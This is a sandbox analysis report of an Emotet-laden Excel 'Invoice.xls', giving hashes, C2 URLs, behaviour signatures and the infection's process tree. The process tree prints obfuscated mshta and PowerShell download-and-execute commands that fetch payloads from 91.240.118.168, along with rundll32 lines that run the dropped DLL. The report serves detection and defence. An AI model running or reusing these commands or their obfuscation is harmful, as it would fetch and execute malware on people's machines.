Analysis
- max time kernel: 160s
- max time network: 195s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 28-01-2022 03:20
Behavioral task: behavioral1
- Sample: Invoice.xls
- Resource: win7-en-20211208
General
- Target: Invoice.xls
- Size: 47KB
- MD5: 3e4821e1a54cdd0b333933a730f0e769
- SHA1: 35a960b514e8b823a8af74c70323681105a04ccb
- SHA256: f8ebf8cca5d8d600ab9f9d9e60b495f4776410c77c99e38d4777091b5d1f7c59
- SHA512: 0bee5ba3825f001370226013acc73f85e64f834faaa5368c7fa3ba8ea871a266e76b5f08fbbcace96579d556cf4b19c13dbdb224ade5378d0f83959e323df6a8
Malware Config
- Extracted: http://91.240.118.168/vvv/ppp/fe.html
- Extracted: http://91.240.118.168/vvv/ppp/fe.png
- Extracted: emotet (Epoch4) C2 configuration
Signatures
-
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process | target process):
- Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4808 | 4100 | CMD.EXE | EXCEL.EXE
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request (5 IoCs)
Processes (flow | pid | process):
- 25 | 4908 | mshta.exe
- 33 | 4524 | powershell.exe
- 35 | 4524 | powershell.exe
- 47 | 4360 | rundll32.exe
- 49 | 4360 | rundll32.exe
-
Downloads MZ/PE file
-
Loads dropped DLL (2 IoCs)
Processes (pid | process):
- 4288 | rundll32.exe
- 3856 | rundll32.exe
-
Drops file in System32 directory (1 IoC)
Processes (description | ioc | process):
- File opened for modification | C:\Windows\SysWOW64\Axopzyychh\tpndka.pbi | rundll32.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash (1 IoC)
Processes (pid | pid_target | process | target process):
- 5020 | 4908 | WerFault.exe | mshta.exe
-
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
-
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description | ioc | process):
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
-
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes (pid | process):
- 4100 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses (19 IoCs)
Processes (pid | process; repeated hits collapsed):
- 5020 | WerFault.exe (14 hits)
- 4524 | powershell.exe (3 hits)
- 4360 | rundll32.exe (2 hits)
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description | pid | process):
- Token: SeDebugPrivilege | 5020 | WerFault.exe
- Token: SeDebugPrivilege | 4524 | powershell.exe
-
Suspicious use of SetWindowsHookEx (13 IoCs)
Processes (pid | process; repeated hits collapsed):
- 4100 | EXCEL.EXE (13 hits)
-
Suspicious use of WriteProcessMemory (20 IoCs)
Processes (description | pid | process | target process; repeated hits collapsed):
- PID 4100 wrote to memory of 4808 | 4100 | EXCEL.EXE | CMD.EXE (2 hits)
- PID 4808 wrote to memory of 4908 | 4808 | CMD.EXE | mshta.exe (2 hits)
- PID 4908 wrote to memory of 4524 | 4908 | mshta.exe | powershell.exe (2 hits)
- PID 4524 wrote to memory of 4416 | 4524 | powershell.exe | cmd.exe (2 hits)
- PID 4416 wrote to memory of 4288 | 4416 | cmd.exe | rundll32.exe (3 hits)
- PID 4288 wrote to memory of 3856 | 4288 | rundll32.exe | rundll32.exe (3 hits)
- PID 3856 wrote to memory of 3120 | 3856 | rundll32.exe | rundll32.exe (3 hits)
- PID 3120 wrote to memory of 4360 | 3120 | rundll32.exe | rundll32.exe (3 hits)
Processes (tree depth given in brackets)
-
[1] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice.xls"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
[2] C:\Windows\SYSTEM32\CMD.EXE
Command line: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
[3] C:\Windows\system32\mshta.exe
Command line: mshta http://91.240.118.168/vvv/ppp/fe.html
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[5] C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
- Suspicious use of WriteProcessMemory
-
[6] C:\Windows\SysWow64\rundll32.exe
Command line: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
[7] C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
[8] C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Axopzyychh\tpndka.pbi",GyVCZQPGl
- Suspicious use of WriteProcessMemory
-
[9] C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Axopzyychh\tpndka.pbi",DllRegisterServer
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
[4] C:\Windows\system32\WerFault.exe
Command line: C:\Windows\system32\WerFault.exe -u -p 4908 -s 1660
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Downloads
-
C:\ProgramData\QWER.dll
- MD5: 4be9fda9a2fdb10c36a1ce820b676e7e
- SHA1: fd74db40bdbc55c29ec996f32d7b7332088f32b2
- SHA256: f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1
- SHA512: 878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed